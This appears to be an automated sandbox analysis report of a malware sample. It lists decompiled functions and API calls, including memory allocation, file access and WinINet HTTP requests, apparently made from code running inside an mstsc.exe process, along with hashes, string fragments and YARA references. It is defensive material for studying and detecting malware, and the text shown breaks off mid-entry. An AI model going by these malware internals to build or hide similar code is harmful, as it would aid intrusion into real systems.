Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mstsc.exe PID: 6868 Parent PID: 1760 mstsc.exeCOMMON

Executed Functions

Function 007082AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00703A01,?,?,?,?,00703A01,FFFFFFFF,?,B=p,?,00000000), ref: 007082A5

Strings

M;p, xrefs: 007082CC, 007082D4

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: M;p
API String ID: 2738559852-3954465157
Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction ID: 901bab547004da0e003398a937011733e05656f8dbaed6121949fc04721ed158
Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
Instruction Fuzzy Hash: 42110972200204BFCB14DF98CC85EEB77A9EF8C754F158658BA5D97381CA30E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007081B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00703B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00703B87,007A002E,00000000,00000060,00000000,00000000), ref: 007081FD

Strings

.z`, xrefs: 007081ED, 007081F8

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: ffec343bab3ff7652f32610e4f6cd62a3e49482c32c7aceba5ef4a0119cbb645
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: C4F0B6B2200108ABCB48CF88DC85DEB77EDAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 007082E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =p,?,?,00703D20,00000000,FFFFFFFF), ref: 00708305

Strings

=p, xrefs: 007082FC, 00708304

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =p
API String ID: 3535843008-4259423856
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: ea5a7965626c4c72e14c04c4c89d25c831176fae5be9f503aa252a87dd32a44e
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 44D01275200214BBD710EF98CC45ED7779CEF48750F154555BA585B382C930F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00708260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00703A01,?,?,?,?,00703A01,FFFFFFFF,?,B=p,?,00000000), ref: 007082A5

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c707f01f479394570564cb85c1790f312b44e66db3c46372e08f73387f0d50a3
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 7CF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0070838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,006F2D11,00002000,00003000,00000004), ref: 007083C9

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
Instruction ID: fdd9f706aaaf93952791e9162938977213198eb9bcc312a76705b733ba40b4d8
Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
Instruction Fuzzy Hash: BBF0F8B5200208ABCB14DF99DC95EAB77A9BF8C350F158259BE5897341C630E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00708390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,006F2D11,00002000,00003000,00000004), ref: 007083C9

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: a091db0540c59967d7d9e55112f9f1d0d641266bd93a433be34ebd9d3ad55563
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: D2F01CB1200208ABCB14DF89CC81EE777ADAF8C750F118248BE0897341C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF986A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4518064a0f14c2d48a13c14db88e201ae5b7780135963a2b950097dd7e29e253
Instruction ID: 31f80d953f9737b81a5aa76a467859555724c334ddff34fbcd0d2eb8576c9ef8
Opcode Fuzzy Hash: 4518064a0f14c2d48a13c14db88e201ae5b7780135963a2b950097dd7e29e253
Instruction Fuzzy Hash: C690027220100413F12161994504707040DD7D0286F91C456A042555CD96D6D962B161

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF984A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ea9c98fbce69bb2e870ff943134072f10c5c41f4b8f7e4bb76ad9a70b73a629
Instruction ID: a98f2441d3d474bd97ef7d8f9e74a2c2eb029e54f6d3580f7380b11638e61aa7
Opcode Fuzzy Hash: 5ea9c98fbce69bb2e870ff943134072f10c5c41f4b8f7e4bb76ad9a70b73a629
Instruction Fuzzy Hash: 27900262242041527555B1994404507440AE7E0286791C056A1415958C85A6E866E661

Uniqueness

Uniqueness Score: -1.00%

Function 04AF99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF99AA

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6b780e5910e870e4772bf9eaf9a8ce04d6f7d1000e165c9c63177dd3b9a41a2
Instruction ID: fe3992c4f89d794d66d2332bdd738f84d4e578adbbfd369a5c8d8f7c39e9a63c
Opcode Fuzzy Hash: f6b780e5910e870e4772bf9eaf9a8ce04d6f7d1000e165c9c63177dd3b9a41a2
Instruction Fuzzy Hash: D49002A234100442F11061994414B060409D7E1346F51C059E106555CD8699DC627166

Uniqueness

Uniqueness Score: -1.00%

Function 04AF95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF95DA

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79e6838950a23330f1990d43c9c49b271dae5ebd3d924c33a4e87b85ddcc1141
Instruction ID: d526e5e8da56abff6411392d2a13a1df04a899db15079a41052b334651ba1ac2
Opcode Fuzzy Hash: 79e6838950a23330f1990d43c9c49b271dae5ebd3d924c33a4e87b85ddcc1141
Instruction Fuzzy Hash: 6F9002A220200003611571994414616440ED7E0246B51C065E1015598DC5A5D8A17165

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF991A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fda63e735aab6c044d0c4747da5f84af144c1f92fab7309f0c3c72ac11aba9fb
Instruction ID: 6352a38a331220dd528b76a095115bb75926f7be9529c63d8dc9677a1848b7a2
Opcode Fuzzy Hash: fda63e735aab6c044d0c4747da5f84af144c1f92fab7309f0c3c72ac11aba9fb
Instruction Fuzzy Hash: F89002B220100402F150719944047460409D7D0346F51C055A506555CE86D9DDE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF954A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92027872cfb24dde6e924e84e1ae965e811535d5dc3d4e3cc3b7d0a81476c108
Instruction ID: 513d6f2438fa40998087a2b99ea4c4cf0dd8c1d63f25da5df29efe4abec36d6b
Opcode Fuzzy Hash: 92027872cfb24dde6e924e84e1ae965e811535d5dc3d4e3cc3b7d0a81476c108
Instruction Fuzzy Hash: 1A900266211000032115A5990704507044AD7D5396351C065F1016558CD6A1D8716161

Uniqueness

Uniqueness Score: -1.00%

Function 04AF96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF96EA

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 781631b7802d8e70d0ff9fd6447b11966eaf1119318200686f767948d5e40c71
Instruction ID: ca66eb1993eaaf53c1dcdca2fc70c147681d527ca624072960e0d9b1c9e6ff0b
Opcode Fuzzy Hash: 781631b7802d8e70d0ff9fd6447b11966eaf1119318200686f767948d5e40c71
Instruction Fuzzy Hash: F590027220108802F1206199840474A0409D7D0346F55C455A442565CD86D5D8A17161

Uniqueness

Uniqueness Score: -1.00%

Function 04AF96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF96DA

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58fa3855278397dbf5e83e705bf349e9aeeff530c8bb0204573341c2d8028ca0
Instruction ID: a216d4da406c66fc377001d7bec9ff8cb46b99469f506de9eb1bc87f0571907e
Opcode Fuzzy Hash: 58fa3855278397dbf5e83e705bf349e9aeeff530c8bb0204573341c2d8028ca0
Instruction Fuzzy Hash: 2C90027220100842F11061994404B460409D7E0346F51C05AA012565CD8695D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF966A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47ef83ce44bda6e7cdcfb8debeb366dbc127a886ff89b36687dea7e1d284660f
Instruction ID: f074536213230475f6618ba3bf5e3dc665e400b9471b5163b2aa91e47336e76d
Opcode Fuzzy Hash: 47ef83ce44bda6e7cdcfb8debeb366dbc127a886ff89b36687dea7e1d284660f
Instruction Fuzzy Hash: 4090027220100802F1907199440464A0409D7D1346F91C059A002665CDCA95DA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF965A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c179df40a68a9c209f6c1c4a70c596afcd99834fc7e2e25c260c9fca25c59ed0
Instruction ID: 36172f36b0d4581ea533baec2c7ca7039882a6a6aea09be118e9158e19bea4bb
Opcode Fuzzy Hash: c179df40a68a9c209f6c1c4a70c596afcd99834fc7e2e25c260c9fca25c59ed0
Instruction Fuzzy Hash: CE90027220504842F15071994404A460419D7D034AF51C055A006569CD96A5DD65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF9A5A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbd4b2704f7fd413d64375337207d05ac3399806fbc17d2c17d053387c00ce13
Instruction ID: 2645cc7901b898cfac74da011eea382d9dbf92e0d42c9c3d6c117eb88e5c6279
Opcode Fuzzy Hash: dbd4b2704f7fd413d64375337207d05ac3399806fbc17d2c17d053387c00ce13
Instruction Fuzzy Hash: 9490026221180042F21065A94C14B070409D7D0347F51C159A015555CCC995D8716561

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF978A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27e1452daa002ec449045934ceb20950684390de877b3ef4f87124ea0d815b98
Instruction ID: 104097c7e833119a4503af3cdfeb688f568ee3f7fb25da83ab7301fd780ba002
Opcode Fuzzy Hash: 27e1452daa002ec449045934ceb20950684390de877b3ef4f87124ea0d815b98
Instruction Fuzzy Hash: 1990026A21300002F1907199540860A0409D7D1247F91D459A001655CCC995D8796361

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF9FEA

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0163a80f48f7d5da6a168eece95c3dee8dc4a6ccb727ee4c7783b0d2844bf8b
Instruction ID: f8518535a741449fe5fd21e137c02246f59a632140851912f01e3569fd6ab1c8
Opcode Fuzzy Hash: b0163a80f48f7d5da6a168eece95c3dee8dc4a6ccb727ee4c7783b0d2844bf8b
Instruction Fuzzy Hash: 4390027231114402F120619984047060409D7D1246F51C455A082555CD86D5D8A17162

Uniqueness

Uniqueness Score: -1.00%

Function 04AF9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF971A

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ecc6ddc07b9f6efdea8de293a1d7dc82978b206e2a2c2368521d9e4ba5a092ec
Instruction ID: 92aecd837d1dd7e659655c1323ec2f99db7bfbd4d8d935dc2cedd480d9613ab8
Opcode Fuzzy Hash: ecc6ddc07b9f6efdea8de293a1d7dc82978b206e2a2c2368521d9e4ba5a092ec
Instruction Fuzzy Hash: 8190027220100402F11065D954086460409D7E0346F51D055A502555DEC6E5D8A17171

Uniqueness

Uniqueness Score: -1.00%

Function 007089AA, Relevance: 28.1, APIs: 1, Strings: 15, Instructions: 75networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0070899C

Strings

rnetReadFile, xrefs: 007089FE, 00708A06
Requ, xrefs: 00708968
File, xrefs: 007089DF
ReadFile, xrefs: 00708A02, 00708A07
rnet, xrefs: 007089D1
Inte, xrefs: 007089CA
HttpSendRequestA, xrefs: 0070898E, 00708999
InternetReadFile, xrefs: 007089FB, 00708A05
Http, xrefs: 0070895A
Read, xrefs: 007089D8
RequestA, xrefs: 00708996, 0070899B
SendRequestA, xrefs: 00708992, 0070899A
Send, xrefs: 00708961
estA, xrefs: 0070896F
HttpSendRequestA, xrefs: 00708950

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: File$Http$HttpSendRequestA$HttpSendRequestA$Inte$InternetReadFile$Read$ReadFile$Requ$RequestA$Send$SendRequestA$estA$rnet$rnetReadFile
API String ID: 360639707-1973197570
Opcode ID: d8a16af77678630884ac5f8faa6de624bb180ffe71c011a0f0c2dd327e7a8a83
Instruction ID: cb457916c798486af803b41a5d42205c5d0497afb9e3325b936e1061ee9d9e0d
Opcode Fuzzy Hash: d8a16af77678630884ac5f8faa6de624bb180ffe71c011a0f0c2dd327e7a8a83
Instruction Fuzzy Hash: 6B2180B5905159EFCB10DF88C945AFFBBB8FF58350F148289F958AB201C6709E118BA2

Uniqueness

Uniqueness Score: -1.00%

Function 007088C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00708928

Strings

Requ, xrefs: 007088E8
OpenRequestA, xrefs: 0070891E, 00708926
HttpOpenRequestA, xrefs: 007088CD, 007088D0
estA, xrefs: 007088EF
Open, xrefs: 007088E1
Http, xrefs: 007088DA
HttpOpenRequestA, xrefs: 0070891A, 00708925
RequestA, xrefs: 00708922, 00708927

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction ID: 2eccfdfa74744201c906c2b6d3d63af235ae062e76f19ac1be73ab85290f9c0f
Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
Instruction Fuzzy Hash: F101E5B2A05119AFCB14DF98D841DEF7BB9EB48310F158288FD48A7245D634EE10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 007088B6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00708928

Strings

Requ, xrefs: 007088E8
OpenRequestA, xrefs: 0070891E, 00708926
HttpOpenRequestA, xrefs: 007088CD, 007088D0
estA, xrefs: 007088EF
Open, xrefs: 007088E1
Http, xrefs: 007088DA
HttpOpenRequestA, xrefs: 0070891A, 00708925
RequestA, xrefs: 00708922, 00708927

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
Instruction ID: 817ef8158ef51d57e51ad206770628f5fa53b064c0562877c3b603738acbe092
Opcode Fuzzy Hash: 605b4d0fa08a74b63c44ab8c643b1c1b7b1e8809eb2b174666cc535769be2ed3
Instruction Fuzzy Hash: 0F0113B2905159AFCB14DF98C881DEF7BB9EF88310F158288FD48A7245C630AA10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00708940, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0070899C

Strings

HttpSendRequestA, xrefs: 0070898E, 00708999
Http, xrefs: 0070895A
Requ, xrefs: 00708968
RequestA, xrefs: 00708996, 0070899B
SendRequestA, xrefs: 00708992, 0070899A
Send, xrefs: 00708961
estA, xrefs: 0070896F
HttpSendRequestA, xrefs: 0070894D, 00708950

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction ID: 2560e1db773d72b06d0d795e2bc56eaed800701b73b0e82fe5b663ee6c76ff11
Opcode Fuzzy Hash: 59ee1c1fde48dd7e1995adb0c33b817c3f2d336c7a31c9a7f5aeb4c8a727f0e6
Instruction Fuzzy Hash: 23014FB2905118AFCB00DF98D8459BF7BB8EB44210F148189FD48A7304D670EE10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0070893D, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 38networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0070899C

Strings

HttpSendRequestA, xrefs: 0070898E, 00708999
Http, xrefs: 0070895A
Requ, xrefs: 00708968
RequestA, xrefs: 00708996, 0070899B
SendRequestA, xrefs: 00708992, 0070899A
Send, xrefs: 00708961
estA, xrefs: 0070896F
HttpSendRequestA, xrefs: 0070894D, 00708950

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
